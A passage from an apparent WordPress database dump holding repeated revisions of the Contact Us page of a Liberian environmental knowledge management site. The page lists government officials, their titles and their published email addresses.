https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-24 11:04:06','2021-03-24 11:04:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3619,42,'2021-03-24 11:27:37','2021-03-24 11:27:37','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-24 11:27:37','2021-03-24 11:27:37','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3620,42,'2021-03-24 11:27:37','2021-03-24 11:27:37','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-24 11:27:37','2021-03-24 11:27:37','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3621,42,'2021-03-24 11:27:37','2021-03-24 11:27:37','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" 